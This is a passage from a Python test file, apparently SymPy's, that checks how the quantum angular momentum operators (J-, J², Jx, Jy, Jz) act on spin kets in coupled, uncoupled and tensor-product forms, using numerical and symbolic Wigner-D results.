assert qapply(Jminus * JyKetCoupled(1, 1, (1, 1))) == hbar * sqrt(2) * JyKetCoupled(
1, 0, (1, 1)
) / 2 - hbar * I * JyKetCoupled(1, 1, (1, 1))
assert qapply(Jminus * JzKetCoupled(1, 1, (1, 1))) == sqrt(2) * hbar * JzKetCoupled(
1, 0, (1, 1)
)
# Symbolic
assert qapply(Jminus * JxKetCoupled(j, m, (j1, j2))) == Sum(
hbar
* sqrt(j ** 2 + j - mi ** 2 + mi)
* WignerD(j, mi, m, 0, pi / 2, 0)
* Sum(
WignerD(j, mi1, mi - 1, 0, pi * Rational(3, 2), 0)
* JxKetCoupled(j, mi1, (j1, j2)),
(mi1, -j, j),
),
(mi, -j, j),
)
assert qapply(Jminus * JyKetCoupled(j, m, (j1, j2))) == Sum(
hbar
* sqrt(j ** 2 + j - mi ** 2 + mi)
* WignerD(j, mi, m, pi * Rational(3, 2), -pi / 2, pi / 2)
* Sum(
WignerD(j, mi1, mi - 1, pi * Rational(3, 2), pi / 2, pi / 2)
* JyKetCoupled(j, mi1, (j1, j2)),
(mi1, -j, j),
),
(mi, -j, j),
)
assert qapply(Jminus * JzKetCoupled(j, m, (j1, j2))) == hbar * sqrt(
j ** 2 + j - m ** 2 + m
) * JzKetCoupled(j, m - 1, (j1, j2))
# Uncoupled operators, uncoupled states
# Numerical
assert qapply(
TensorProduct(Jminus, 1) * TensorProduct(JxKet(1, 1), JxKet(1, -1))
) == hbar * sqrt(2) * TensorProduct(
JxKet(1, 0), JxKet(1, -1)
) / 2 + hbar * TensorProduct(
JxKet(1, 1), JxKet(1, -1)
)
assert (
qapply(TensorProduct(1, Jminus) * TensorProduct(JxKet(1, 1), JxKet(1, -1)))
== -hbar * TensorProduct(JxKet(1, 1), JxKet(1, -1))
- hbar * sqrt(2) * TensorProduct(JxKet(1, 1), JxKet(1, 0)) / 2
)
assert qapply(
TensorProduct(Jminus, 1) * TensorProduct(JyKet(1, 1), JyKet(1, -1))
) == hbar * sqrt(2) * TensorProduct(
JyKet(1, 0), JyKet(1, -1)
) / 2 - hbar * I * TensorProduct(
JyKet(1, 1), JyKet(1, -1)
)
assert (
qapply(TensorProduct(1, Jminus) * TensorProduct(JyKet(1, 1), JyKet(1, -1)))
== hbar * I * TensorProduct(JyKet(1, 1), JyKet(1, -1))
+ hbar * sqrt(2) * TensorProduct(JyKet(1, 1), JyKet(1, 0)) / 2
)
assert qapply(
TensorProduct(Jminus, 1) * TensorProduct(JzKet(1, 1), JzKet(1, -1))
) == sqrt(2) * hbar * TensorProduct(JzKet(1, 0), JzKet(1, -1))
assert (
qapply(TensorProduct(1, Jminus) * TensorProduct(JzKet(1, 1), JzKet(1, -1))) == 0
)
# Symbolic
assert qapply(
TensorProduct(Jminus, 1) * TensorProduct(JxKet(j1, m1), JxKet(j2, m2))
) == TensorProduct(
Sum(
hbar
* sqrt(j1 ** 2 + j1 - mi ** 2 + mi)
* WignerD(j1, mi, m1, 0, pi / 2, 0)
* Sum(
WignerD(j1, mi1, mi - 1, 0, pi * Rational(3, 2), 0) * JxKet(j1, mi1),
(mi1, -j1, j1),
),
(mi, -j1, j1),
),
JxKet(j2, m2),
)
assert qapply(
TensorProduct(1, Jminus) * TensorProduct(JxKet(j1, m1), JxKet(j2, m2))
) == TensorProduct(
JxKet(j1, m1),
Sum(
hbar
* sqrt(j2 ** 2 + j2 - mi ** 2 + mi)
* WignerD(j2, mi, m2, 0, pi / 2, 0)
* Sum(
WignerD(j2, mi1, mi - 1, 0, pi * Rational(3, 2), 0) * JxKet(j2, mi1),
(mi1, -j2, j2),
),
(mi, -j2, j2),
),
)
assert qapply(
TensorProduct(Jminus, 1) * TensorProduct(JyKet(j1, m1), JyKet(j2, m2))
) == TensorProduct(
Sum(
hbar
* sqrt(j1 ** 2 + j1 - mi ** 2 + mi)
* WignerD(j1, mi, m1, pi * Rational(3, 2), -pi / 2, pi / 2)
* Sum(
WignerD(j1, mi1, mi - 1, pi * Rational(3, 2), pi / 2, pi / 2)
* JyKet(j1, mi1),
(mi1, -j1, j1),
),
(mi, -j1, j1),
),
JyKet(j2, m2),
)
assert qapply(
TensorProduct(1, Jminus) * TensorProduct(JyKet(j1, m1), JyKet(j2, m2))
) == TensorProduct(
JyKet(j1, m1),
Sum(
hbar
* sqrt(j2 ** 2 + j2 - mi ** 2 + mi)
* WignerD(j2, mi, m2, pi * Rational(3, 2), -pi / 2, pi / 2)
* Sum(
WignerD(j2, mi1, mi - 1, pi * Rational(3, 2), pi / 2, pi / 2)
* JyKet(j2, mi1),
(mi1, -j2, j2),
),
(mi, -j2, j2),
),
)
assert qapply(
TensorProduct(Jminus, 1) * TensorProduct(JzKet(j1, m1), JzKet(j2, m2))
) == hbar * sqrt(j1 ** 2 + j1 - m1 ** 2 + m1) * TensorProduct(
JzKet(j1, m1 - 1), JzKet(j2, m2)
)
assert qapply(
TensorProduct(1, Jminus) * TensorProduct(JzKet(j1, m1), JzKet(j2, m2))
) == hbar * sqrt(j2 ** 2 + j2 - m2 ** 2 + m2) * TensorProduct(
JzKet(j1, m1), JzKet(j2, m2 - 1)
)
def test_j2():
assert Commutator(J2, Jz).doit() == 0
assert J2.matrix_element(1, 1, 1, 1) == 2 * hbar ** 2
# Normal operators, normal states
# Numerical
assert qapply(J2 * JxKet(1, 1)) == 2 * hbar ** 2 * JxKet(1, 1)
assert qapply(J2 * JyKet(1, 1)) == 2 * hbar ** 2 * JyKet(1, 1)
assert qapply(J2 * JzKet(1, 1)) == 2 * hbar ** 2 * JzKet(1, 1)
# Symbolic
assert qapply(J2 * JxKet(j, m)) == hbar ** 2 * j ** 2 * JxKet(
j, m
) + hbar ** 2 * j * JxKet(j, m)
assert qapply(J2 * JyKet(j, m)) == hbar ** 2 * j ** 2 * JyKet(
j, m
) + hbar ** 2 * j * JyKet(j, m)
assert qapply(J2 * JzKet(j, m)) == hbar ** 2 * j ** 2 * JzKet(
j, m
) + hbar ** 2 * j * JzKet(j, m)
# Normal operators, coupled states
# Numerical
assert qapply(J2 * JxKetCoupled(1, 1, (1, 1))) == 2 * hbar ** 2 * JxKetCoupled(
1, 1, (1, 1)
)
assert qapply(J2 * JyKetCoupled(1, 1, (1, 1))) == 2 * hbar ** 2 * JyKetCoupled(
1, 1, (1, 1)
)
assert qapply(J2 * JzKetCoupled(1, 1, (1, 1))) == 2 * hbar ** 2 * JzKetCoupled(
1, 1, (1, 1)
)
# Symbolic
assert qapply(
J2 * JxKetCoupled(j, m, (j1, j2))
) == hbar ** 2 * j ** 2 * JxKetCoupled(
j, m, (j1, j2)
) + hbar ** 2 * j * JxKetCoupled(
j, m, (j1, j2)
)
assert qapply(
J2 * JyKetCoupled(j, m, (j1, j2))
) == hbar ** 2 * j ** 2 * JyKetCoupled(
j, m, (j1, j2)
) + hbar ** 2 * j * JyKetCoupled(
j, m, (j1, j2)
)
assert qapply(
J2 * JzKetCoupled(j, m, (j1, j2))
) == hbar ** 2 * j ** 2 * JzKetCoupled(
j, m, (j1, j2)
) + hbar ** 2 * j * JzKetCoupled(
j, m, (j1, j2)
)
# Uncoupled operators, uncoupled states
# Numerical
assert qapply(
TensorProduct(J2, 1) * TensorProduct(JxKet(1, 1), JxKet(1, -1))
) == 2 * hbar ** 2 * TensorProduct(JxKet(1, 1), JxKet(1, -1))
assert qapply(
TensorProduct(1, J2) * TensorProduct(JxKet(1, 1), JxKet(1, -1))
) == 2 * hbar ** 2 * TensorProduct(JxKet(1, 1), JxKet(1, -1))
assert qapply(
TensorProduct(J2, 1) * TensorProduct(JyKet(1, 1), JyKet(1, -1))
) == 2 * hbar ** 2 * TensorProduct(JyKet(1, 1), JyKet(1, -1))
assert qapply(
TensorProduct(1, J2) * TensorProduct(JyKet(1, 1), JyKet(1, -1))
) == 2 * hbar ** 2 * TensorProduct(JyKet(1, 1), JyKet(1, -1))
assert qapply(
TensorProduct(J2, 1) * TensorProduct(JzKet(1, 1), JzKet(1, -1))
) == 2 * hbar ** 2 * TensorProduct(JzKet(1, 1), JzKet(1, -1))
assert qapply(
TensorProduct(1, J2) * TensorProduct(JzKet(1, 1), JzKet(1, -1))
) == 2 * hbar ** 2 * TensorProduct(JzKet(1, 1), JzKet(1, -1))
# Symbolic
assert qapply(
TensorProduct(J2, 1) * TensorProduct(JxKet(j1, m1), JxKet(j2, m2))
) == hbar ** 2 * j1 ** 2 * TensorProduct(
JxKet(j1, m1), JxKet(j2, m2)
) + hbar ** 2 * j1 * TensorProduct(
JxKet(j1, m1), JxKet(j2, m2)
)
assert qapply(
TensorProduct(1, J2) * TensorProduct(JxKet(j1, m1), JxKet(j2, m2))
) == hbar ** 2 * j2 ** 2 * TensorProduct(
JxKet(j1, m1), JxKet(j2, m2)
) + hbar ** 2 * j2 * TensorProduct(
JxKet(j1, m1), JxKet(j2, m2)
)
assert qapply(
TensorProduct(J2, 1) * TensorProduct(JyKet(j1, m1), JyKet(j2, m2))
) == hbar ** 2 * j1 ** 2 * TensorProduct(
JyKet(j1, m1), JyKet(j2, m2)
) + hbar ** 2 * j1 * TensorProduct(
JyKet(j1, m1), JyKet(j2, m2)
)
assert qapply(
TensorProduct(1, J2) * TensorProduct(JyKet(j1, m1), JyKet(j2, m2))
) == hbar ** 2 * j2 ** 2 * TensorProduct(
JyKet(j1, m1), JyKet(j2, m2)
) + hbar ** 2 * j2 * TensorProduct(
JyKet(j1, m1), JyKet(j2, m2)
)
assert qapply(
TensorProduct(J2, 1) * TensorProduct(JzKet(j1, m1), JzKet(j2, m2))
) == hbar ** 2 * j1 ** 2 * TensorProduct(
JzKet(j1, m1), JzKet(j2, m2)
) + hbar ** 2 * j1 * TensorProduct(
JzKet(j1, m1), JzKet(j2, m2)
)
assert qapply(
TensorProduct(1, J2) * TensorProduct(JzKet(j1, m1), JzKet(j2, m2))
) == hbar ** 2 * j2 ** 2 * TensorProduct(
JzKet(j1, m1), JzKet(j2, m2)
) + hbar ** 2 * j2 * TensorProduct(
JzKet(j1, m1), JzKet(j2, m2)
)
def test_jx():
assert Commutator(Jx, Jz).doit() == -I * hbar * Jy
assert Jx.rewrite("plusminus") == (Jminus + Jplus) / 2
assert (
represent(Jx, basis=Jz, j=1)
== (represent(Jplus, basis=Jz, j=1) + represent(Jminus, basis=Jz, j=1)) / 2
)
# Normal operators, normal states
# Numerical
assert qapply(Jx * JxKet(1, 1)) == hbar * JxKet(1, 1)
assert qapply(Jx * JyKet(1, 1)) == hbar * JyKet(1, 1)
assert qapply(Jx * JzKet(1, 1)) == sqrt(2) * hbar * JzKet(1, 0) / 2
# Symbolic
assert qapply(Jx * JxKet(j, m)) == hbar * m * JxKet(j, m)
assert qapply(Jx * JyKet(j, m)) == Sum(
hbar
* mi
* WignerD(j, mi, m, 0, 0, pi / 2)
* Sum(
WignerD(j, mi1, mi, pi * Rational(3, 2), 0, 0) * JyKet(j, mi1), (mi1, -j, j)
),
(mi, -j, j),
)
assert (
qapply(Jx * JzKet(j, m))
== hbar * sqrt(j ** 2 + j - m ** 2 - m) * JzKet(j, m + 1) / 2
+ hbar * sqrt(j ** 2 + j - m ** 2 + m) * JzKet(j, m - 1) / 2
)
# Normal operators, coupled states
# Numerical
assert qapply(Jx * JxKetCoupled(1, 1, (1, 1))) == hbar * JxKetCoupled(1, 1, (1, 1))
assert qapply(Jx * JyKetCoupled(1, 1, (1, 1))) == hbar * JyKetCoupled(1, 1, (1, 1))
assert (
qapply(Jx * JzKetCoupled(1, 1, (1, 1)))
== sqrt(2) * hbar * JzKetCoupled(1, 0, (1, 1)) / 2
)
# Symbolic
assert qapply(Jx * JxKetCoupled(j, m, (j1, j2))) == hbar * m * JxKetCoupled(
j, m, (j1, j2)
)
assert qapply(Jx * JyKetCoupled(j, m, (j1, j2))) == Sum(
hbar
* mi
* WignerD(j, mi, m, 0, 0, pi / 2)
* Sum(
WignerD(j, mi1, mi, pi * Rational(3, 2), 0, 0)
* JyKetCoupled(j, mi1, (j1, j2)),
(mi1, -j, j),
),
(mi, -j, j),
)
assert (
qapply(Jx * JzKetCoupled(j, m, (j1, j2)))
== hbar * sqrt(j ** 2 + j - m ** 2 - m) * JzKetCoupled(j, m + 1, (j1, j2)) / 2
+ hbar * sqrt(j ** 2 + j - m ** 2 + m) * JzKetCoupled(j, m - 1, (j1, j2)) / 2
)
# Normal operators, uncoupled states
# Numerical
assert qapply(
Jx * TensorProduct(JxKet(1, 1), JxKet(1, 1))
) == 2 * hbar * TensorProduct(JxKet(1, 1), JxKet(1, 1))
assert qapply(Jx * TensorProduct(JyKet(1, 1), JyKet(1, 1))) == hbar * TensorProduct(
JyKet(1, 1), JyKet(1, 1)
) + hbar * TensorProduct(JyKet(1, 1), JyKet(1, 1))
assert (
qapply(Jx * TensorProduct(JzKet(1, 1), JzKet(1, 1)))
== sqrt(2) * hbar * TensorProduct(JzKet(1, 1), JzKet(1, 0)) / 2
+ sqrt(2) * hbar * TensorProduct(JzKet(1, 0), JzKet(1, 1)) / 2
)
assert qapply(Jx * TensorProduct(JxKet(1, 1), JxKet(1, -1))) == 0
# Symbolic
assert qapply(
Jx * TensorProduct(JxKet(j1, m1), JxKet(j2, m2))
) == hbar * m1 * TensorProduct(
JxKet(j1, m1), JxKet(j2, m2)
) + hbar * m2 * TensorProduct(
JxKet(j1, m1), JxKet(j2, m2)
)
assert qapply(Jx * TensorProduct(JyKet(j1, m1), JyKet(j2, m2))) == TensorProduct(
Sum(
hbar
* mi
* WignerD(j1, mi, m1, 0, 0, pi / 2)
* Sum(
WignerD(j1, mi1, mi, pi * Rational(3, 2), 0, 0) * JyKet(j1, mi1),
(mi1, -j1, j1),
),
(mi, -j1, j1),
),
JyKet(j2, m2),
) + TensorProduct(
JyKet(j1, m1),
Sum(
hbar
* mi
* WignerD(j2, mi, m2, 0, 0, pi / 2)
* Sum(
WignerD(j2, mi1, mi, pi * Rational(3, 2), 0, 0) * JyKet(j2, mi1),
(mi1, -j2, j2),
),
(mi, -j2, j2),
),
)
assert (
qapply(Jx * TensorProduct(JzKet(j1, m1), JzKet(j2, m2)))
== hbar
* sqrt(j1 ** 2 + j1 - m1 ** 2 - m1)
* TensorProduct(JzKet(j1, m1 + 1), JzKet(j2, m2))
/ 2
+ hbar
* sqrt(j1 ** 2 + j1 - m1 ** 2 + m1)
* TensorProduct(JzKet(j1, m1 - 1), JzKet(j2, m2))
/ 2
+ hbar
* sqrt(j2 ** 2 + j2 - m2 ** 2 - m2)
* TensorProduct(JzKet(j1, m1), JzKet(j2, m2 + 1))
/ 2
+ hbar
* sqrt(j2 ** 2 + j2 - m2 ** 2 + m2)
* TensorProduct(JzKet(j1, m1), JzKet(j2, m2 - 1))
/ 2
)
# Uncoupled operators, uncoupled states
# Numerical
assert qapply(
TensorProduct(Jx, 1) * TensorProduct(JxKet(1, 1), JxKet(1, -1))
) == hbar * TensorProduct(JxKet(1, 1), JxKet(1, -1))
assert qapply(
TensorProduct(1, Jx) * TensorProduct(JxKet(1, 1), JxKet(1, -1))
) == -hbar * TensorProduct(JxKet(1, 1), JxKet(1, -1))
assert qapply(
TensorProduct(Jx, 1) * TensorProduct(JyKet(1, 1), JyKet(1, -1))
) == hbar * TensorProduct(JyKet(1, 1), JyKet(1, -1))
assert qapply(
TensorProduct(1, Jx) * TensorProduct(JyKet(1, 1), JyKet(1, -1))
) == -hbar * TensorProduct(JyKet(1, 1), JyKet(1, -1))
assert (
qapply(TensorProduct(Jx, 1) * TensorProduct(JzKet(1, 1), JzKet(1, -1)))
== hbar * sqrt(2) * TensorProduct(JzKet(1, 0), JzKet(1, -1)) / 2
)
assert (
qapply(TensorProduct(1, Jx) * TensorProduct(JzKet(1, 1), JzKet(1, -1)))
== hbar * sqrt(2) * TensorProduct(JzKet(1, 1), JzKet(1, 0)) / 2
)
# Symbolic
assert qapply(
TensorProduct(Jx, 1) * TensorProduct(JxKet(j1, m1), JxKet(j2, m2))
) == hbar * m1 * TensorProduct(JxKet(j1, m1), JxKet(j2, m2))
assert qapply(
TensorProduct(1, Jx) * TensorProduct(JxKet(j1, m1), JxKet(j2, m2))
) == hbar * m2 * TensorProduct(JxKet(j1, m1), JxKet(j2, m2))
assert qapply(
TensorProduct(Jx, 1) * TensorProduct(JyKet(j1, m1), JyKet(j2, m2))
) == TensorProduct(
Sum(
hbar
* mi
* WignerD(j1, mi, m1, 0, 0, pi / 2)
* Sum(
WignerD(j1, mi1, mi, pi * Rational(3, 2), 0, 0) * JyKet(j1, mi1),
(mi1, -j1, j1),
),
(mi, -j1, j1),
),
JyKet(j2, m2),
)
assert qapply(
TensorProduct(1, Jx) * TensorProduct(JyKet(j1, m1), JyKet(j2, m2))
) == TensorProduct(
JyKet(j1, m1),
Sum(
hbar
* mi
* WignerD(j2, mi, m2, 0, 0, pi / 2)
* Sum(
WignerD(j2, mi1, mi, pi * Rational(3, 2), 0, 0) * JyKet(j2, mi1),
(mi1, -j2, j2),
),
(mi, -j2, j2),
),
)
assert (
qapply(TensorProduct(Jx, 1) * TensorProduct(JzKet(j1, m1), JzKet(j2, m2)))
== hbar
* sqrt(j1 ** 2 + j1 - m1 ** 2 - m1)
* TensorProduct(JzKet(j1, m1 + 1), JzKet(j2, m2))
/ 2
+ hbar
* sqrt(j1 ** 2 + j1 - m1 ** 2 + m1)
* TensorProduct(JzKet(j1, m1 - 1), JzKet(j2, m2))
/ 2
)
assert (
qapply(TensorProduct(1, Jx) * TensorProduct(JzKet(j1, m1), JzKet(j2, m2)))
== hbar
* sqrt(j2 ** 2 + j2 - m2 ** 2 - m2)
* TensorProduct(JzKet(j1, m1), JzKet(j2, m2 + 1))
/ 2
+ hbar
* sqrt(j2 ** 2 + j2 - m2 ** 2 + m2)
* TensorProduct(JzKet(j1, m1), JzKet(j2, m2 - 1))
/ 2
)
def test_jy():
assert Commutator(Jy, Jz).doit() == I * hbar * Jx
assert Jy.rewrite("plusminus") == (Jplus - Jminus) / (2 * I)
assert represent(Jy, basis=Jz) == (
represent(Jplus, basis=Jz) - represent(Jminus, basis=Jz)
) / (2 * I)
# Normal operators, normal states
# Numerical
assert qapply(Jy * JxKet(1, 1)) == hbar * JxKet(1, 1)
assert qapply(Jy * JyKet(1, 1)) == hbar * JyKet(1, 1)
assert qapply(Jy * JzKet(1, 1)) == sqrt(2) * hbar * I * JzKet(1, 0) / 2
# Symbolic
assert qapply(Jy * JxKet(j, m)) == Sum(
hbar
* mi
* WignerD(j, mi, m, pi * Rational(3, 2), 0, 0)
* Sum(WignerD(j, mi1, mi, 0, 0, pi / 2) * JxKet(j, mi1), (mi1, -j, j)),
(mi, -j, j),
)
assert qapply(Jy * JyKet(j, m)) == hbar * m * JyKet(j, m)
assert (
qapply(Jy * JzKet(j, m))
== -hbar * I * sqrt(j ** 2 + j - m ** 2 - m) * JzKet(j, m + 1) / 2
+ hbar * I * sqrt(j ** 2 + j - m ** 2 + m) * JzKet(j, m - 1) / 2
)
# Normal operators, coupled states
# Numerical
assert qapply(Jy * JxKetCoupled(1, 1, (1, 1))) == hbar * JxKetCoupled(1, 1, (1, 1))
assert qapply(Jy * JyKetCoupled(1, 1, (1, 1))) == hbar * JyKetCoupled(1, 1, (1, 1))
assert (
qapply(Jy * JzKetCoupled(1, 1, (1, 1)))
== sqrt(2) * hbar * I * JzKetCoupled(1, 0, (1, 1)) / 2
)
# Symbolic
assert qapply(Jy * JxKetCoupled(j, m, (j1, j2))) == Sum(
hbar
* mi
* WignerD(j, mi, m, pi * Rational(3, 2), 0, 0)
* Sum(
WignerD(j, mi1, mi, 0, 0, pi / 2) * JxKetCoupled(j, mi1, (j1, j2)),
(mi1, -j, j),
),
(mi, -j, j),
)
assert qapply(Jy * JyKetCoupled(j, m, (j1, j2))) == hbar * m * JyKetCoupled(
j, m, (j1, j2)
)
assert (
qapply(Jy * JzKetCoupled(j, m, (j1, j2)))
== -hbar
* I
* sqrt(j ** 2 + j - m ** 2 - m)
* JzKetCoupled(j, m + 1, (j1, j2))
/ 2
+ hbar
* I
* sqrt(j ** 2 + j - m ** 2 + m)
* JzKetCoupled(j, m - 1, (j1, j2))
/ 2
)
# Normal operators, uncoupled states
# Numerical
assert qapply(Jy * TensorProduct(JxKet(1, 1), JxKet(1, 1))) == hbar * TensorProduct(
JxKet(1, 1), JxKet(1, 1)
) + hbar * TensorProduct(JxKet(1, 1), JxKet(1, 1))
assert qapply(
Jy * TensorProduct(JyKet(1, 1), JyKet(1, 1))
) == 2 * hbar * TensorProduct(JyKet(1, 1), JyKet(1, 1))
assert (
qapply(Jy * TensorProduct(JzKet(1, 1), JzKet(1, 1)))
== sqrt(2) * hbar * I * TensorProduct(JzKet(1, 1), JzKet(1, 0)) / 2
+ sqrt(2) * hbar * I * TensorProduct(JzKet(1, 0), JzKet(1, 1)) / 2
)
assert qapply(Jy * TensorProduct(JyKet(1, 1), JyKet(1, -1))) == 0
# Symbolic
assert qapply(Jy * TensorProduct(JxKet(j1, m1), JxKet(j2, m2))) == TensorProduct(
JxKet(j1, m1),
Sum(
hbar
* mi
* WignerD(j2, mi, m2, pi * Rational(3, 2), 0, 0)
* Sum(WignerD(j2, mi1, mi, 0, 0, pi / 2) * JxKet(j2, mi1), (mi1, -j2, j2)),
(mi, -j2, j2),
),
) + TensorProduct(
Sum(
hbar
* mi
* WignerD(j1, mi, m1, pi * Rational(3, 2), 0, 0)
* Sum(WignerD(j1, mi1, mi, 0, 0, pi / 2) * JxKet(j1, mi1), (mi1, -j1, j1)),
(mi, -j1, j1),
),
JxKet(j2, m2),
)
assert qapply(
Jy * TensorProduct(JyKet(j1, m1), JyKet(j2, m2))
) == hbar * m1 * TensorProduct(
JyKet(j1, m1), JyKet(j2, m2)
) + hbar * m2 * TensorProduct(
JyKet(j1, m1), JyKet(j2, m2)
)
assert (
qapply(Jy * TensorProduct(JzKet(j1, m1), JzKet(j2, m2)))
== -hbar
* I
* sqrt(j1 ** 2 + j1 - m1 ** 2 - m1)
* TensorProduct(JzKet(j1, m1 + 1), JzKet(j2, m2))
/ 2
+ hbar
* I
* sqrt(j1 ** 2 + j1 - m1 ** 2 + m1)
* TensorProduct(JzKet(j1, m1 - 1), JzKet(j2, m2))
/ 2
+ -hbar
* I
* sqrt(j2 ** 2 + j2 - m2 ** 2 - m2)
* TensorProduct(JzKet(j1, m1), JzKet(j2, m2 + 1))
/ 2
+ hbar
* I
* sqrt(j2 ** 2 + j2 - m2 ** 2 + m2)
* TensorProduct(JzKet(j1, m1), JzKet(j2, m2 - 1))
/ 2
)
# Uncoupled operators, uncoupled states
# Numerical
assert qapply(
TensorProduct(Jy, 1) * TensorProduct(JxKet(1, 1), JxKet(1, -1))
) == hbar * TensorProduct(JxKet(1, 1), JxKet(1, -1))
assert qapply(
TensorProduct(1, Jy) * TensorProduct(JxKet(1, 1), JxKet(1, -1))
) == -hbar * TensorProduct(JxKet(1, 1), JxKet(1, -1))
assert qapply(
TensorProduct(Jy, 1) * TensorProduct(JyKet(1, 1), JyKet(1, -1))
) == hbar * TensorProduct(JyKet(1, 1), JyKet(1, -1))
assert qapply(
TensorProduct(1, Jy) * TensorProduct(JyKet(1, 1), JyKet(1, -1))
) == -hbar * TensorProduct(JyKet(1, 1), JyKet(1, -1))
assert (
qapply(TensorProduct(Jy, 1) * TensorProduct(JzKet(1, 1), JzKet(1, -1)))
== hbar * sqrt(2) * I * TensorProduct(JzKet(1, 0), JzKet(1, -1)) / 2
)
assert (
qapply(TensorProduct(1, Jy) * TensorProduct(JzKet(1, 1), JzKet(1, -1)))
== -hbar * sqrt(2) * I * TensorProduct(JzKet(1, 1), JzKet(1, 0)) / 2
)
# Symbolic
assert qapply(
TensorProduct(Jy, 1) * TensorProduct(JxKet(j1, m1), JxKet(j2, m2))
) == TensorProduct(
Sum(
hbar
* mi
* WignerD(j1, mi, m1, pi * Rational(3, 2), 0, 0)
* Sum(WignerD(j1, mi1, mi, 0, 0, pi / 2) * JxKet(j1, mi1), (mi1, -j1, j1)),
(mi, -j1, j1),
),
JxKet(j2, m2),
)
assert qapply(
TensorProduct(1, Jy) * TensorProduct(JxKet(j1, m1), JxKet(j2, m2))
) == TensorProduct(
JxKet(j1, m1),
Sum(
hbar
* mi
* WignerD(j2, mi, m2, pi * Rational(3, 2), 0, 0)
* Sum(WignerD(j2, mi1, mi, 0, 0, pi / 2) * JxKet(j2, mi1), (mi1, -j2, j2)),
(mi, -j2, j2),
),
)
assert qapply(
TensorProduct(Jy, 1) * TensorProduct(JyKet(j1, m1), JyKet(j2, m2))
) == hbar * m1 * TensorProduct(JyKet(j1, m1), JyKet(j2, m2))
assert qapply(
TensorProduct(1, Jy) * TensorProduct(JyKet(j1, m1), JyKet(j2, m2))
) == hbar * m2 * TensorProduct(JyKet(j1, m1), JyKet(j2, m2))
assert (
qapply(TensorProduct(Jy, 1) * TensorProduct(JzKet(j1, m1), JzKet(j2, m2)))
== -hbar
* I
* sqrt(j1 ** 2 + j1 - m1 ** 2 - m1)
* TensorProduct(JzKet(j1, m1 + 1), JzKet(j2, m2))
/ 2
+ hbar
* I
* sqrt(j1 ** 2 + j1 - m1 ** 2 + m1)
* TensorProduct(JzKet(j1, m1 - 1), JzKet(j2, m2))
/ 2
)
assert (
qapply(TensorProduct(1, Jy) * TensorProduct(JzKet(j1, m1), JzKet(j2, m2)))
== -hbar
* I
* sqrt(j2 ** 2 + j2 - m2 ** 2 - m2)
* TensorProduct(JzKet(j1, m1), JzKet(j2, m2 + 1))
/ 2
+ hbar
* I
* sqrt(j2 ** 2 + j2 - m2 ** 2 + m2)
* TensorProduct(JzKet(j1, m1), JzKet(j2, m2 - 1))
/ 2
)
def test_jz():
assert Commutator(Jz, Jminus).doit() == -hbar * Jminus
# Normal operators, normal states
# Numerical
assert qapply(Jz * JxKet(1, 1)) == -sqrt(2) * hbar * JxKet(1, 0) / 2
assert qapply(Jz * JyKet(1, 1)) == -sqrt(2) * hbar * I * JyKet(1, 0) / 2
assert qapply(Jz * JzKet(2, 1)) == hbar * JzKet(2, 1)
# Symbolic
assert qapply(Jz * JxKet(j, m)) == Sum(
hbar
* mi
* WignerD(j, mi, m, 0, pi / 2, 0)
* Sum(
WignerD(j, mi1, mi, 0, pi * Rational(3, 2), 0) * JxKet(j, mi1), (mi1, -j, j)
),
(mi, -j, j),
)
assert qapply(Jz * JyKet(j, m)) == Sum(
hbar
* mi
* WignerD(j, mi, m, pi * Rational(3, 2), -pi / 2, pi / 2)
* Sum(
WignerD(j, mi1, mi, pi * Rational(3, 2), pi / 2, pi / 2) * JyKet(j, mi1),
(mi1, -j, j),
),
(mi, -j, j),
)
assert qapply(Jz * JzKet(j, m)) == hbar * m * JzKet(j, m)
# Normal operators, coupled states
# Numerical
assert (
qapply(Jz * JxKetCoupled(1, 1, (1, 1)))
== -sqrt(2) * hbar * JxKetCoupled(1, 0, (1, 1)) / 2
)
assert (
qapply(Jz * JyKetCoupled(1, 1, (1, 1)))
== -sqrt(2) * hbar * I * JyKetCoupled(1, 0, (1, 1)) / 2
)
assert qapply(Jz * JzKetCoupled(1, 1, (1, 1))) == hbar * JzKetCoupled(1, 1, (1, 1))
# Symbolic
assert qapply(Jz * JxKetCoupled(j, m, (j1, j2))) == Sum(
hbar
* mi
* WignerD(j, mi, m, 0, pi / 2, 0)
* Sum(
WignerD(j, mi1, mi, 0, pi * Rational(3, 2), 0)
* JxKetCoupled(j, mi1, (j1, j2)),
(mi1, -j, j),
),
(mi, -j, j),
)
assert qapply(Jz * JyKetCoupled(j, m, (j1, j2))) == Sum(
hbar
* mi
* WignerD(j, mi, m, pi * Rational(3, 2), -pi / 2, pi / 2)
* Sum(
WignerD(j, mi1, mi, pi * Rational(3, 2), pi / 2, pi / 2)
* JyKetCoupled(j, mi1, (j1, j2)),
(mi1, -j, j),
),
(mi, -j, j),
)
assert qapply(Jz * JzKetCoupled(j, m, (j1, j2))) == hbar * m * JzKetCoupled(
j, m, (j1, j2)
)
# Normal operators, uncoupled states
# Numerical
assert (
qapply(Jz * TensorProduct(JxKet(1, 1), JxKet(1, 1)))
== -sqrt(2) * hbar * TensorProduct(JxKet(1, 1), JxKet(1, 0)) / 2
- sqrt(2) * hbar * TensorProduct(JxKet(1, 0), JxKet(1, 1)) / 2
)
assert (
qapply(Jz * TensorProduct(JyKet(1, 1), JyKet(1, 1)))
== -sqrt(2) * hbar * I * TensorProduct(JyKet(1, 1), JyKet(1, 0)) / 2
- sqrt(2) * hbar * I * TensorProduct(JyKet(1, 0), JyKet(1, 1)) / 2
)
assert qapply(
Jz * TensorProduct(JzKet(1, 1), JzKet(1, 1))
) == 2 * hbar * TensorProduct(JzKet(1, 1), JzKet(1, 1))
assert qapply(Jz * TensorProduct(JzKet(1, 1), JzKet(1, -1))) == 0
# Symbolic
assert qapply(Jz * TensorProduct(JxKet(j1, m1), JxKet(j2, m2))) == TensorProduct(
JxKet(j1, m1),
Sum(
hbar
* mi
* WignerD(j2, mi, m2, 0, pi / 2, 0)
* Sum(
WignerD(j2, mi1, mi, 0, pi * Rational(3, 2), 0) * JxKet(j2, mi1),
(mi1, -j2, j2),
),
(mi, -j2, j2),
),
) + TensorProduct(
Sum(
hbar
* mi
* WignerD(j1, mi, m1, 0, pi / 2, 0)
* Sum(
WignerD(j1, mi1, mi, 0, pi * Rational(3, 2), 0) * JxKet(j1, mi1),
(mi1, -j1, j1),
),
(mi, -j1, j1),
),
JxKet(j2, m2),
)
assert qapply(Jz * TensorProduct(JyKet(j1, m1), JyKet(j2, m2))) == TensorProduct(
JyKet(j1, m1),
Sum(
hbar
* mi
* WignerD(j2, mi, m2, pi * Rational(3, 2), -pi / 2, pi / 2)
* Sum(
